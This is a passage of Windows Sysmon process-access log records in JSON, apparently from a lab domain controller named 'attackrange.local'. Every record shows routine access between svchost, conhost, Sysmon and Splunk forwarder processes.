07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001097E50300}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001097E50300}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.455\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-001097E50300}\r\nSourceProcessId: 3772\r\nSourceThreadId: 3776\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.455","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-001097E50300}","SourceProcessId":"3772","SourceThreadId":"3776","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.455\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001097E50300}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.455","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001097E50300}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
